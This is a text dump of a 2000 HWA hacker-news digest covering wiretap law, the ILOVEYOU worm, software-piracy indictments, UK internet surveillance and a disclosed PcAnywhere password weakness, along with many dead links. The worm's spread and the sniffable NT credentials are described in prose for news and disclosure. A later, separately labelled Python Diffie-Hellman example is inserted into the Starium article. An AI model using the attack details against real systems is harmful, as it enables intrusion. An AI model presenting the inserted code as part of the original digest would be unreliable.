Each federal and state judge is required to file a written report with the Director of the Administrative Office of the U.S. Courts on each application for an order authorizing the interception of a wire, oral, or electronic communication (18 U.S.C. 2519(1)). No report to the Administrative Office is required when an order is issued with the consent of one of the principal parties to the communication.

A summary report on authorized intercepts is attached. The full report can be found on the Judiciary’s website at www.uscourts.gov.

@HWA

155.0 [HNN] Minors Lose Rights In Georgia
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

May 4th

contributed by n0body

Georgia law now allows parents to record juveniles' telephone and email communications if they believe the child is involved in criminal activity or otherwise in danger. (And what about the person who the child is talking to, do they have any rights?)

APB Online
http://www.apbnews.com/safetycenter/family/2000/05/03/wiretap0503_01.html

Georgia Lets Parents Tap Kids' Phones

Officials Say Safety, Criminal Concerns Outweigh Privacy Issue

May 3, 2000

By Randy Wyles

ATLANTA (APBnews.com) -- Parents and prosecutors in Georgia have a new weapon in their fight to protect children from crime -- the right to record juveniles' phone conversations.

Under a new law signed by Gov. Roy Barnes last week, parents can legally record their children's private phone conversations and e-mails if they believe the children are in danger or involved in criminal activity.

The legislation stems from a case in the Atlanta suburb of Marietta in which the district attorney and the parents of a 13-year-old girl said a former family friend molested the teen.
The prosecutor in the case had tried to introduce audio recordings into court as evidence of allegedly inappropriate sexual phone conversations between the child and the accused.

Kyle "Rick" Bishop, 40, was charged with aggravated child molestation and aggravated sexual battery for the alleged affair with the girl.

"I guarantee if you or anyone else hears the tapes, there will be no doubt in anyone's mind that he is guilty," said David C. Scott, the girl's father.

Late-night calls led to visits

The girl was 11 when Bishop, a neighbor, allegedly began fostering a relationship with her that Scott said he wanted to develop sexually. Scott said Bishop claims his daughter pursued him.

The girl's parents became suspicious when late-night phone calls led to frequent visits by the child to Bishop's home to watch television. So the parents began eavesdropping and recording the phone conversations.

One night four years ago, Scott's wife listened in on a conversation that shocked her.

"The nature of that conversation was so sexually explicit that my wife immediately called the police after making my daughter hang up the telephone," Scott said.

One party must know of tap

Bishop was arrested and charged. As part of his bond agreement, he was not allowed within a mile of the family, which meant he had to move. The court even refused to let him return to his home, forcing Bishop to arrange for friends to move his belongings.

The case was finally placed on the court docket last year. But during a pretrial hearing, Bishop's defense attorney filed a motion preventing the tapes from being introduced as evidence, citing a violation of Georgia privacy laws.

Georgia law permits a person to record phone conversations as long as one of the parties involved with the call is aware it's being done.
Bishop's attorney contended neither the child nor Bishop knew the calls were being recorded and that the parents did not have a right to record the conversations, even though they were made on the Scotts' home phones and involved their child.

The court ruled against the defense motion, but Bishop took it to the Court of Appeals, which overturned the ruling in his favor.

At the same time, the Georgia Legislature took up the issue and passed a measure that allows parents the right to record their children's conversations.

Can law be applied retroactively?

Meanwhile, Cobb County District Attorney Pat Head of Marietta, the prosecutor in the case, filed a motion to overturn the Court of Appeals' decision with the Georgia Supreme Court, which has yet to rule.

There is some debate as to whether the new law could actually be applied retroactively to the very case that sparked the legislation.

"If [the Georgia Supreme Court] does affirm the Court of Appeals, then we're taking the position that the law that has changed is procedural and not substantive and that it does not affect any of [Bishop's] constitutional rights nor any of his statutory rights, but is simply a matter under which evidence is admitted in court," Head said.

But the district attorney still feels positive about the new law, no matter how the case is resolved.

"It's a tool by which the parents are going to be given, at least, the availability of keeping some control of their children and knowing what their children are involved in," Head said.

As far as the Scotts are concerned, their hopes rest with Head, the Georgia Supreme Court and the new law.

"I'm saddened that my daughter has had a number of years of her childhood stolen from her," Scott said. "But it's just not part of my constitution to want to take a baseball bat to somebody. Seeing this guy go to jail, that makes me very, very gratified."

Randy Wyles is an APBnews.com correspondent in Atlanta.
@HWA

156.0 [HNN] 'I Love You'
      ~~~~~~~~~~~~~~~~~~

May 5th

contributed by Everybody

Technical Details

First, as soon as a user opens the worm file (usually by double-clicking), the malicious code accesses the Microsoft Outlook address book and sends a copy of itself to every entry.

Second, the worm copies itself into images (.jpg and .jpeg), Visual Basic scripts (.vbs and .vbe) and Javascript (.js and .jse) deleting their previous contents. Music files (.mp3 and .mp2) are hidden and a file of the same name which contains the worm's script and a .vbs file extension is put in its place. The worm will also infect files on networked and mapped drives as well as sending itself to people who join a chat room with an infected member (via mIRC).

Finally, the virus will attempt to contact one of four Web sites in the Philippines that supposedly have a file called WIN-BUGSFIX.exe prepared for download. Those sites have since been taken off line by the Internet service provider.

ZD Net
CNN
Reuters

Quick Facts

The virus/worm appears to have originated in the Philippines although some reports now indicate Europe.

The malicious code spread around the world in approximately six hours.

CERT claims 300,000 infected computers at 250 sites world wide were reported as of 2pm EST yesterday. This dwarfs Melissa's reach.

There are already at least three variants including one called 'joke' and 'Susitikim'.

Various Links

People who have analyzed the code have said that its organization is rather sloppy and it does not indicate good programming skills. Look for yourself: SANS has posted a copy of the source.
SANS

The hosting company of the four web pages pointed to by the virus/worm has been taken off line by the ISP.
ZD Net

The CERT Advisory recommends that network administrators place filters on "ILOVEYOU" in the email headers. (This will not stop the variants though.)
CERT

Changing subject line defeats some filters.
C|Net

'I Love You' clean up expected to dwarf Melissa's $80 million price tag.
C|Net

FW:Joke replacing ILOVEYOU in trip around the world.
MSNBC

Several anti-virus software vendors have set up 'I Love You' information centers and they have posted new versions of their virus definition files.
F-Secure
Symantec
BindView

http://www.zdnet.com/zdnn/stories/news/0,4586,2562483,00.html?chkpt
http://cnn.com/2000/TECH/computing/05/04/iloveyou/index.html
http://dailynews.yahoo.com/h/nm/20000504/ts/tech_virus.html
http://www.sans.org/y2k/050400-1100.htm
http://www.zdnet.com/zdnn/stories/news/0,4586,2562211,00.html
http://www.cert.org/advisories/CA-2000-04.html
http://news.cnet.com/news/0-1003-200-1815107.html?tag
http://news.cnet.com/news/0-1003-200-1814907.html?tag
http://www.msnbc.com/news/403350.asp?bt
http://www.msnbc.com/m/olk2k/
http://www.f-secure.com
http://www.symantec.com/avcenter/venc/data/vbs.loveletter.a.html
http://www.bindview.com/news/2000/0504.html

@HWA

157.0 [HNN] Microsoft Employee Busted for Piracy
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

May 5th

contributed by acopalyse

A Chicago Grand Jury has indicted 17 people, including a former employee of Microsoft and five employees of Intel for allegedly infringing the copyright on more than 5,000 computer software programs. 12 of the 17 were allegedly members of the group known as 'Pirates with Attitudes' (PWA), infiltrated by government agents last year. PWA's alleged leader, Marlenus (Robin Rothberg), was also indicted.

[ Yes PWA *did* influence our choice of a name for HWA and *no* we do not have any official affiliation with the group or any of its members past or present.. - Ed ]

ABC News
http://abcnews.go.com/sections/tech/DailyNews/Intel000504.html

Suspected Software Thieves Indicted

Authorities Arrest Microsoft, Intel Employees

C H I C A G O, May 4 — Prosecutors today announced the indictment of a global ring of suspected software thieves and five workers at chip maker Intel Corp.
who allegedly exchanged hardware for access to an array of pirated software.

A federal grand jury in Chicago indicted 17 people, including a former Microsoft Corp. employee and two Europeans, for allegedly infringing the copyright on more than 5,000 computer software programs.

Of those indicted, 12 were allegedly members of the group known as “Pirates with Attitudes” (PWA), a software piracy ring that was infiltrated by government investigators last year.

Their Web site, identified by prosecutors as “Sentinel” or “WAREZ”, was located on a computer at the University of Sherbrooke in Quebec and accumulated software that was stripped of its embedded copy protection by members.

Programs available for downloading to those provided access via a secure Internet protocol address included operating systems, applications such as word processing and data analysis, games and MP3 music files, prosecutors said.

Four employees of Santa Clara, California-based Intel shipped hardware to the site in Canada in 1998 to give it more storage capacity. In exchange, they and other Intel employees were to be given access to the pirated software, which a fifth employee allegedly arranged. The company was unaware of the scheme, prosecutors said.

Microsoft Employee Implicated

Another defendant was an employee of Redmond, Washington-based Microsoft Corp. who allegedly supplied bootleg copies of the software giant’s products for the site. He also allegedly gave access to Microsoft’s internal network to the ringleader of PWA.

The alleged ringleader, Robin Rothberg, 32, also known by the online moniker “Marlenus,” of North Chelmsford, Massachusetts, was charged in February with conspiring to violate the copyrights on thousands of computer programs. He has been out of jail on bond but was summoned to appear in Chicago.

Among those indicted were alleged PWA members from Belgium and Sweden.
Last year, the Justice Department said it was launching an initiative to combat piracy and counterfeiting of intellectual property.

“This is the most significant investigation of copyright infringement involving the use of the Internet conducted to date by the FBI,” said Kathleen McChesney, head of the FBI’s Chicago office.

If convicted, the defendants could spend five years in prison and pay a $250,000 fine, or they could be ordered to pay a fine totaling twice the gross gain to any defendant or twice the gross loss to any victim, whichever is greater.

@HWA

158.0 [HNN] Cisco Insider Convicted of Stealing PIX Source
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

May 5th

contributed by acopalyse

A former employee of Cisco Systems has been found guilty by a jury in Santa Clara County Superior Court of stealing the source code to Private Internet Exchange (PIX). The source code was estimated to be worth billions of dollars. (Yes, that is a B.)

San Jose Mercury News
http://www.mercurycenter.com/svtech/news/front/docs/cisco050300.htm

Url fucked off

@HWA

159.0 [HNN] British Plan to Monitor Net
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

May 5th

contributed by The Hex

The British are building the Government Technical Assistance Centre to eavesdrop on all information sent over the Internet in Britain. The system will be centered in the headquarters of MI5, the British secret service agency. All of Britain's Internet Service Providers will be connected to the GTAC through dedicated lines (which they will have to pay for themselves). The government insists that when the system is finished by the end of this year that absolutely nothing will be intercepted without a warrant. (Uh huh, sure.)

Wired
http://www.wired.com/news/business/0,1367,36031,00.html

Brits Launch Online Spy Network

Wired News Report

3:00 a.m. May. 2, 2000 PDT

A few weeks back, Russia's secret service agency raised privacy watchdogs' hackles when it admitted it could intercept and monitor all Russian Internet traffic.

On Sunday the British government acknowledged that it was building a system that could do the same thing in Great Britain, ostensibly to help catch money launderers, terrorists, pedophiles, and other criminals who do business online.

It also could help usher in an era of Orwellian surveillance, privacy advocates fear. "They've taken a lead from the KGB," said Jason Catlett, president of Junkbusters, an online privacy advocacy group.

The British system, called the Government Technical Assistance Centre, will have its hub in the headquarters of the MI5, the British secret service agency. All of Britain's Internet Service Providers will be connected to the GTAC through dedicated lines (which they will have to pay for themselves).

After its scheduled completion by the end of the year, the system will allow British police and secret service agents to intercept every bit of the country's Internet traffic. That could include email, credit card transactions, banking data -- any information exchanged between computers on the Web.

But absolutely nothing will be intercepted without a warrant, the British government insists.

"There's no way (the security services) are going to be trawling through everybody's emails," said a government spokeswoman. "Every intercept will be obtained in the same way it is now: a warrant has to be signed by the secretary of state."

It's no different than tapping phone lines, the government insisted.

Despite the government's assurances, legal experts warn that the system could be easily abused.

"It sounds reasonable -- catch terrorists, criminals, and so on -- but it has the potential to be particularly unreasonable," said Brian Smith, an international e-commerce and banking attorney with the Washington-based law firm Mayer Brown & Platt. "They will know where people are putting their money, how they're spending, who they're talking to."

Security agents might be tempted to access information without a warrant, or might obtain warrants on dubious pretexts.

Moreover, Net users and businesses all over the world could potentially be affected by the system.

"This is not just a matter for the U.K.," Smith said. "They'll be able to see everything that goes through the U.K. A multinational company may be sending confidential information about its business plans through the U.K., and who knows what might happen? Just look at how the U.S. government has used employee emails in its case against Microsoft."

The British government's acknowledgment of its planned system is sure to re-ignite speculation about the existence of Echelon, a supposed international electronic surveillance network. Privacy advocates and a number of politicians are convinced that the system exists, but government officials in Europe and the United States have repeatedly denied it.

Reuters contributed to this report.

@HWA

160.0 [HNN] MPAA Tries to Ban 2600 Lawyer
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

May 5th

contributed by Macki

The MPAA has filed a motion to disqualify the high profile lawyer retained by 2600 in its fight over DeCSS. The MPAA suit alleges that Martin Garbus' firm cannot represent 2600 due to a conflict of interest.
2600.com

This legal brief is immense but it is a tour de force for reverse engineering and fair use rights. Let's hope the court agrees! Definitely recommended reading for anyone interested in this case.
Cryptome

http://www.2600.com/news/2000/0505.html
http://cryptome.org/mpaa-v-2600-rb.htm

@HWA

161.0 [HNN] Apache.org Defaced
      ~~~~~~~~~~~~~~~~~~~~~~~~

May 5th

(My story seems to have been ripped since the info/article I sent on this to them shows through in this text, that's 'ok' I suppose ... isn't it?
- Ed)

contributed by McIntyre

Home of the popular Apache software was defaced last month by a group of determined individuals. Unlike an ordinary intrusion that uses scripts or vulnerabilities in the operating system, these hackers focused solely on configuration errors to change the 'Powered by Apache' logo to 'Powered by Back Office'. (Yes, this was actually a hack and not a script kiddie clicking a mouse button.)

Attrition.org - Mirror of Defaced Site
Dataloss.net - How they did it.

http://www.attrition.org/mirror/attrition/2000/05/03/www.apache.org/
http://www.dataloss.net/papers/how.defaced.apache.org.txt

@HWA

162.0 [HNN] Voice Security on the Cheap
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

May 5th

contributed by dark_wyrm

Starium, a company based in Monterey, CA, plans to sell telephone scrambling devices that connect to the handset of any telephone. The units would compress, filter, and encrypt voice communications. Starium claims that there is no NSA backdoor. Retail price for the unit is expected to be less than $100.

Wired
http://www.wired.com/news/technology/0,1282,21236,00.html

Starium Promises Phone Privacy
by Declan McCullagh
3:00 a.m. Aug. 12, 1999 PDT

MONTEREY, California -- The sleepy coastal town of Monterey, California, is not the kind of place where vision-fired entrepreneurs come to change the world.

Monterey Bay is better known for sea lions than silicon, and for Cannery Row -- made famous half a century ago in John Steinbeck's gritty, eponymous novel.

Today, the third floor of a converted sardine factory on Cannery Row is home to a startup company developing what could become a new world standard in privacy protection.

By early 2000, Starium Inc. plans to begin selling sub-US$100 telephone scrambling devices so powerful that even the US government's most muscular supercomputers can't eavesdrop on wiretapped conversations.
Such heavily armored privacy is currently available only to government and corporate customers who pony up about $3,000 for STU-III secure phones created by the US National Security Agency. By squeezing the same kind of ultra-strong encryption into a sleek brushed-steel case about twice the size of a Palm V -- and crafted by the same San Francisco designer -- Starium hopes to bring crypto to the masses. "Americans by nature don't like people reading over their shoulders," says Lee Caplin, president and CEO of Starium. True enough. But whether Americans will pay extra for privacy is open to question, especially since both people in a conversation need the Starium "handsets" to chat securely. And there's another big obstacle: The US government has repeatedly tried to keep similar products off the market unless they have a backdoor for surveillance. Its export rules prevent Starium from freely shipping its products overseas. Starium's three co-founders -- the company has since grown to eight people -- claim they're not fazed. "The technology is out there. Whether they like it or not, it exists," says Bernie Sardinha, Starium chief operations officer. "You cannot stop progress. You cannot stop technology." Starium at first planned to call its product CallGuard, but abandoned the name after discovering another company owned the trademark. The firm is considering VoiceSafe as another potential name. Customers will use the device by plugging it into their telephone handset -- a feature allowing it to work with office systems -- and plugging the handset into the base of the phone. At the touch of a "secure" button, the modems inside the two Starium units will form a link that, theoretically, creates an untappable communications channel. The units digitize, compress, filter, and encrypt voice communications -- and reverse the process on the other end. 
The Starium handset uses a 2,048-bit Diffie-Hellman algorithm for the initial setup, and a 168-bit triple DES algorithm for voice encoding. The four-chip unit includes a 75 MHz MIPS processor, an infrared interface, a smart card port, and possibly serial, USB, and parallel interfaces, the company says. The final version will operate for over 2 hours on a pair of AA batteries. Starium's business plan is nothing if not ambitious. In addition to selling the portable units, the company wants to add crypto capabilities to cell phones, faxes, and even corporate networks. Target markets include the legal, medical, banking, and even political fields. "I've gotten a call from the George W. Bush people for use in the campaign," CEO Caplin says. The company says it's working on deals with major cell phone manufacturers like Ericsson and Nokia to offer the same voice-scrambling in software. Newer cell phones have enough memory and a fast enough processor to handle the encryption. Best of all, a software upgrade could be free. "You take your phone into a mall or a kiosk and they simply burn in the new flash ROM," Sardinha says. The idea for Starium came from longtime cypherpunk and company co-founder Eric Blossom, who was inspired by the Clinton administration's now-abandoned Clipper Chip plan to devise a way to talk privately. "I got interested around the time of Clipper. I was scratching my head saying, 'This is offensive,'" says Blossom, a former engineer at Hewlett Packard and Clarity Software. Blossom created prototype devices and sold them online. But they were clunky -- about the size of a desktop modem. They were also expensive, and didn't sell very well. The company's directors include Robert Kohn, former chief counsel for PGP and Borland International, and Whitfield Diffie, distinguished engineer at Sun Microsystems and co-inventor of public key cryptography. 
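The setup the Wired article describes (a 2,048-bit Diffie-Hellman exchange, then a 168-bit triple DES key for the voice stream), as an added example that is not Starium's code or protocol. The group (RFC 3526 group 14), the SHA-256 key derivation, the labels and the read-aloud verification code are all assumptions; the code is there because plain Diffie-Hellman does not by itself show either party who is on the other end.

```python
"""Added example: Diffie-Hellman setup feeding a 3-key triple-DES voice key.

Constructed illustration, not Starium's protocol or code.
"""
import hashlib
import secrets

# Assumption: the 2048-bit MODP group (group 14) from RFC 3526. The article
# gives only the modulus size, not the group the handset uses.
P = int(
    "FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD1"
    "29024E088A67CC74020BBEA63B139B22514A08798E3404DD"
    "EF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245"
    "E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7ED"
    "EE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3D"
    "C2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F"
    "83655D23DCA3AD961C62F356208552BB9ED529077096966D"
    "670C354E4ABC9804F1746C08CA18217C32905E462E36CE3B"
    "E39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9"
    "DE2BCBF6955817183995497CEA956AE515D2261898FA0510"
    "15728E5A8AACAA68FFFFFFFFFFFFFFFF", 16)
G = 2
LABEL_KEY, LABEL_CODE = b"voice-key", b"verify"  # hypothetical labels

# The four DES weak keys (odd-parity form); a stage keyed with one of
# these is its own inverse, so such subkeys are rejected.
DES_WEAK = {bytes.fromhex(h) for h in (
    "0101010101010101", "FEFEFEFEFEFEFEFE",
    "E0E0E0E0F1F1F1F1", "1F1F1F1F0E0E0E0E")}


def dh_keypair():
    """Return (private exponent x, public value g^x mod p)."""
    x = secrets.randbelow(P - 3) + 2
    return x, pow(G, x, P)


def is_valid_public(y):
    """Accept only 2 <= y <= p-2.

    0, 1 and p-1 force the shared secret into {0, 1, p-1}, so whoever
    injects them can predict the resulting key.
    """
    return isinstance(y, int) and 2 <= y <= P - 2


def shared_secret(own_private, peer_public):
    if not is_valid_public(peer_public):
        raise ValueError("peer public value out of range")
    return pow(peer_public, own_private, P).to_bytes(256, "big")


def odd_parity(raw):
    """Set the low bit of each byte so every byte has an odd number of 1s."""
    out = bytearray()
    for b in raw:
        top7 = b & 0xFE
        out.append(top7 | (0 if bin(top7).count("1") % 2 else 1))
    return bytes(out)


def _transcript(caller_pub, answerer_pub):
    return caller_pub.to_bytes(256, "big") + answerer_pub.to_bytes(256, "big")


def derive_3des_key(secret, caller_pub, answerer_pub):
    """Derive 24 bytes = three 8-byte DES subkeys = 3 x 56 = 168 key bits."""
    for counter in range(256):
        digest = hashlib.sha256(LABEL_KEY + bytes([counter]) + secret
                                + _transcript(caller_pub, answerer_pub)).digest()
        key = odd_parity(digest[:24])
        parts = {key[0:8], key[8:16], key[16:24]}
        # Equal subkeys collapse 3DES to fewer key bits; retry if so.
        if len(parts) == 3 and not parts & DES_WEAK:
            return key
    raise RuntimeError("no usable key found")


def verification_code(secret, caller_pub, answerer_pub):
    """Short code both speakers read aloud; it differs if someone sits in
    the middle running a separate exchange with each side."""
    digest = hashlib.sha256(LABEL_CODE + secret
                            + _transcript(caller_pub, answerer_pub)).digest()
    return digest.hex()[:8]


def simulate_call():
    """Run both handsets' sides; return (key_a, key_b, code_a, code_b)."""
    a_priv, a_pub = dh_keypair()   # caller
    b_priv, b_pub = dh_keypair()   # answerer
    a_secret = shared_secret(a_priv, b_pub)
    b_secret = shared_secret(b_priv, a_pub)
    return (derive_3des_key(a_secret, a_pub, b_pub),
            derive_3des_key(b_secret, a_pub, b_pub),
            verification_code(a_secret, a_pub, b_pub),
            verification_code(b_secret, a_pub, b_pub))
```
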
@HWA 163.0 [HNN] Takedown Reviewed ~~~~~~~~~~~~~~~~~~~~~~~ May 5th contributed by William Knowles The movie 'Takedown', which details the pursuit and capture of Kevin Mitnick and is based on the Markoff book of the same name, is starting to get a little press potentially in anticipation of its US debut. The movie has already been released in France and has received less than stellar reviews. San Francisco Chronicle http://www.sfgate.com/cgi-bin/article.cgi?file Url deceased @HWA 164.0 [HNS] Apr 8:NEW KIND OF SECURITY SCANNER ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by BHZ Saturday 8 April 2000 on 3:33 AM ISS is offering an on-line scanner for Web sites which surveys users' hard drives to detect any potentially dangerous programs, such as Trojans and viruses, that may have been placed on the machine without their knowledge. Link: The Register http://www.theregister.co.uk/000407-000033.html Dead url @HWA 165.0 [HNS] April 8:WAYS TO ATTACK ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by BHZ Saturday 8 April 2000 on 3:32 AM Following recent high-profile Web security breaches, Enstar, an e-security firm, hosted a live demonstration in San Antonio Friday to show the many ways hackers break into systems. Link: CRN http://www.crn.com/dailies/digest/breakingnews.asp?ArticleID Bad url/server error @HWA 166.0 [HNS] April 7:STOLEN ACCOUNTS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by BHZ Friday 7 April 2000 on 6:50 PM "Malicious hackers" from overseas have been racking up surfing bills for unsuspecting SingNet customers by using their Internet accounts, The Straits Times has found out. Link: The Straits Times http://www.straitstimes.asia1.com/singapore/sin20_0407.html Dead url @HWA 167.0 [HNS] April 7:JAILED FOR SIX MONTHS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by BHZ Friday 7 April 2000 on 6:48 PM Po Yiu-ming, 19, who was among the first three hackers to be convicted since computer crime-related laws were enacted in 1994, was jailed for six months yesterday. 
Link: SCMP
http://www.scmp.com/News/HongKong/Article/FullText_asp_ArticleID-20000406015347330.asp

Dead url

@HWA

168.0 [HNS] April 7: PcANYWHERE WEAK PASSWORD ENCRYPTION
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

by BHZ
Friday 7 April 2000 on 4:27 PM

PcAnywhere 9.0.0 set to its default security value uses a trivial encryption method so user names and passwords are not sent directly in clear. Since most users have the encryption method set to either "none" or "PcAnyWhere", their passwords are sent with weak encryption.

Link: Bugware
http://net-security.org/cgi-bin/bugs/fullnews.cgi?newsid955117228,48342,

PcAnywhere weak password encryption
Posted to BugTraq on 7.4.2000

PcAnywhere 9.0.0 set to its default security value uses a trivial encryption method so user names and passwords are not sent directly in clear. Since most users have the encryption method set to either "none" or "PcAnyWhere", their passwords are sent with weak encryption.

A major concern lies in the fact that PcAnywhere can authenticate users based on their NT domain accounts and passwords. When the user logs on, it is prompted for its NT username and password. They are then "encrypted" through the PcAnywhere method and decrypted by the host computer for validation by the NT domain controller.

Someone snooping on the traffic between the two stations will unlock both the PcAnywhere and NT account. All that without even having to go through the L0phtCrack process.

Version 7.0 is not at risk since no encryption is used at all. Username and password are sent in clear. I haven't tested version 8 yet.

--- Solution ---

Symantec says that this was not intended to be real encryption and suggests the use of the Public or Symmetric key option instead.
More info can be found at:
http://service1.symantec.com/SUPPORT/pca.nsf/docid/1999022312571812&src=w

@HWA

169.0 [HNS] April 7: NET PRIVACY TOOLS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

by BHZ
Friday 7 April 2000 on 3:46 PM

Microsoft promised free Internet tools based on emerging privacy standards for controlling how much information people using the Web reveal.

Link: CNET
http://news.cnet.com/news/0-1005-200-1655289.html?dtn.head

Microsoft plans free Net privacy tools
By The Associated Press
Special to CNET News.com
April 7, 2000, 4:50 a.m. PT

TORONTO--Microsoft promised free Internet tools based on emerging privacy standards for controlling how much information people using the Web reveal.

Coming from the world's largest software company, the tools could give impetus for Web sites and other companies to embrace the Platform for Privacy Practices, or P3P. The World Wide Web Consortium, an Internet standards group, may finalize P3P this summer.

Richard Purcell, Microsoft's chief privacy officer, said the tools will help consumers better understand how sites track visits and pass along information to other parties. A formal announcement is expected in a few weeks.

Purcell disclosed the company's intent during an interview yesterday at the Computers, Freedom and Privacy conference here, meeting through today.

People using the Internet are increasingly concerned about Web sites that create profiles of email addresses, favorite books and clothing sizes for marketing purposes. Sites often disclose their intent in privacy statements that are difficult to find and understand.

The Microsoft tools, to be released this fall, will translate such statements into machine-readable form and let Internet surfers block access to sites that collect too much.

With the software, people using the Web can state what types of information they are willing to give, as well as whether they mind sharing that information with outside parties.
Internet surfers will receive a warning before visiting sites that go beyond that level.

Microsoft plans to make the tools for its browser, Internet Explorer, and for the competing Netscape browsers.

Lorrie Cranor, who heads a P3P working group, considered Microsoft's decision important, saying, "In order for P3P to be widely used, there has to be good user software available.

"The question I always get is, 'Is Microsoft going to implement it?'" she said.

[Caption: Lorrie Cranor, chair of the P3P specification working group at the W3C, discusses the proposed privacy standard.]

Still, critics believe Web sites won't have incentives to join, rendering such tools and standards meaningless. Jason Catlett, president of Junkbusters and a critic of P3P, said wide adoption remains years away.

Copyright © 2000 Associated Press. All rights reserved. This material may not be published, broadcast, rewritten, or redistributed.

@HWA

170.0 [HNS] April 7:SECURITY ADDITIONS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

by BHZ
Friday 7 April 2000 on 3:45 PM

Cisco Systems next week plans to ramp up its VPN security with a new addition to its PIX firewall line as well as an updated version of its Secure Policy Manager software for enterprise users.

Link: InfoWorld
http://www.infoworld.com/articles/en/xml/00/04/06/000406enciscofirewall.xml

Cisco plans firewall addition for small businesses
By Cathleen Moore

CISCO SYSTEMS NEXT week plans to ramp up its VPN (virtual private network) security with a new addition to its PIX firewall line as well as an updated version of its Secure Policy Manager software for enterprise users.

The Cisco PIX Firewall 506 will bring a low-end offering aimed at small businesses and branch offices to the company's existing firewall set. Other products in the family include the PIX 515, targeted at small and midsize enterprises, and the Secure PIX 520, which is designed for large enterprise installations.
With its newest firewall member, Cisco is attempting to tap into small business environments, which -- with increasing reliance on the Internet -- are seeking more powerful security solutions for remote access technologies and VPN. About the size of a hardback, the PIX 506 can handle throughput of 10Mbps and 3DES encryption at rates of 4Mbps, according to Cisco. The 506 firewall holds a 200MHz Intel Pentium III processor, 32MB of RAM, and two integrated Fast Ethernet ports. Version 2.0 of Cisco Secure Policy Manager adds improved scalability and additional support for IPsec VPN configurations in Cisco's routers and firewalls. The Policy Manager lets IT managers define and audit network security policies from a central location, according to the company. The product also can simplify deployment of security services supported by Cisco's firewalls and IOS-based VPN routers, Cisco said. The Cisco Secure PIX Firewall 506 will be available in May, priced starting at $1,950. The Secure Policy Manager 2.0 will begin shipping this month, priced at $7,500. Cisco Systems Inc., in San Jose, Calif., is at www.cisco.com. Cathleen Moore is an InfoWorld reporter. @HWA 171.0 [HNS] April 7:COOKIES ~~~~~~~~~~~~~~~~~~~~~ by BHZ Friday 7 April 2000 on 3:43 PM You say you don't like browser cookies? You're not quite sure if that program you download from the Net is revealing more about you than it should? Wired has an article about it and we had a discussion on them on our forum. Link: Wired on cookies Link: HNS forum http://www.wired.com/news/politics/0,1283,35498,00.html http://default.net-security.org/phorum/read.php3?num Getting Snooped On? Too Bad by Declan McCullagh 3:00 a.m. Apr. 7, 2000 PDT TORONTO -- You say you don't like browser cookies? You're not quite sure if that program you download from the Net is revealing more about you than it should? Well, here's something to make you really nervous: In the United States, it may be illegal to disable software that snoops on you. 
The folks who came up with this idea turn out to be the large corporations that helped to draft the Digital Millennium Copyright Act (DMCA), which restricts some forms of tampering with copyright protection devices. In some cases, that means you won't be able to turn off any surveillance features it might include, according to participants in a Thursday afternoon panel at the Computers, Freedom and Privacy conference. "Privacy circumvention is possible only under a limited circumstance," said Paul Schwartz of the Brooklyn Law School. As more and more copyrighted material makes its way online, content owners are turning to encryption to protect their works from widespread illicit redistribution. Stephen King distributed his recent novel online in encrypted form, and music companies are backing Secure Digital Memory Card for audio players. Privacy advocates fret that if future works are secure and thus protected under the DMCA, they could reveal consumers' private behavior --RealNetworks' RealJukebox player secretly did just that -- and tinkering with the program to turn off the reporting mechanism would be illegal. "The practical impact is it's another area we're going to be fighting about," Schwartz said. The DMCA, which became law in October 1998, does allow some very limited forms of privacy circumvention. You're allowed to do it if the software leaks "personally identifying information" about you without giving you the ability to say no, and if you're not "in violation of any other law." But here's the rub: Many, if not most, programs include shrink-wrap licenses that prohibit reverse-engineering or altering the program. Some courts have said that shrink-wrap licenses -- software license agreements that don't require a signature -- are binding. If you violate them, would you be able to take advantage of the DMCA's privacy-circumvention loophole? The answer may well be yes. 
"The statute is basically totally incoherent," says Pam Samuelson, a professor at the University of California at Berkeley and an influential copyright scholar. "We're getting tortured by laws that are inherently incoherent," complained Barry Steinhardt, associate director of the ACLU. Violating the DMCA is a civil offense, and "willfully" violating it for private financial gain is a criminal offense punishable by five years in jail and a $500,000 fine. @HWA 172.0 [HNS] April 7:SECURE E-MAIL SERVICE ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by BHZ Friday 7 April 2000 on 3:39 PM The Royal Mail has launched a secure e-mail service through its secure technology service, ViaCode. Link: Silicon.com http://www.silicon.com/public/door?REQUNIQ @HWA 173.0 [HNS] April 7:ONLINE MUGGERS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by BHZ Friday 7 April 2000 on 3:38 PM "You are running a Web site. Making money perhaps, and visitors are seeing your message. Then, according to your perimeter intrusion-detection device, some online goofball or criminal hacker is beating on your door. What are you going to do?" Read Winn Schwartau's article. Link: IDG.net http://www.idg.net/servlet/ContentServlet?global_doc_id Url was eaten by an AOL hax0r or some shit @HWA 174.0 [HNS] April 6:SURVEY BY DTI ~~~~~~~~~~~~~~~~~~~~~~~~~~~ by BHZ Thursday 6 April 2000 on 3:00 PM British companies are too complacent when it comes to Internet security and only have themselves to blame if their IT systems are compromised by hackers. That is one of the conclusions published by Department of Trade and Industry. Contributed by Lady Sharrow. 
Link: The Register
http://www.theregister.co.uk/000406-000023.html

Dead url

@HWA

175.0 [HNS] April 6: COMPUTER CODES PROTECTED
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

by BHZ
